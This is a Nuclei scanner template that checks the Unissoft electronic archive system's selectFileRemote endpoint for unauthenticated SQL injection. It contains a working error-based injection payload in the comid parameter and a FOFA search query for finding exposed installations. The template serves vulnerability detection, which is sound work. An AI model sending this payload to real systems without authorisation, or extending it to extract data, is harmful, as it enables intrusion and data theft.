http:
    - matchers:
        - part: body
          type: word
          words:
            - ~e10adc3949ba59abbe56e057f20f883
      raw:
        - |
          POST /Archive/ErecordManage/selectFileRemote HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
          Content-Type: application/x-www-form-urlencoded

          userID=admin&fondsid=1&comid=' and updatexml(1,concat(0x7e,MD5(123456),0x7e),1)=1
id: ziguangdianzi-selectFileRemote-sql
info:
    author: Superhero
    description: |-
        fofa: body="www.unissoft.com"
        紫光电子档案管理系统 selectFileRemote 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 紫光电子档案管理系统 selectFileRemote SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487235&idx=1&sn=25f8a0b4ebc42cf005e8183f5256e51e&chksm=c267ba30f5103326d99ede96b761468f0da2eb174293443821dccd30fbecbd871a42791191c3&token=101124693&lang=zh_CN#rd
    severity: high
    tags:
        - 紫光电子档案管理系统
        - ecor
        - ECOR
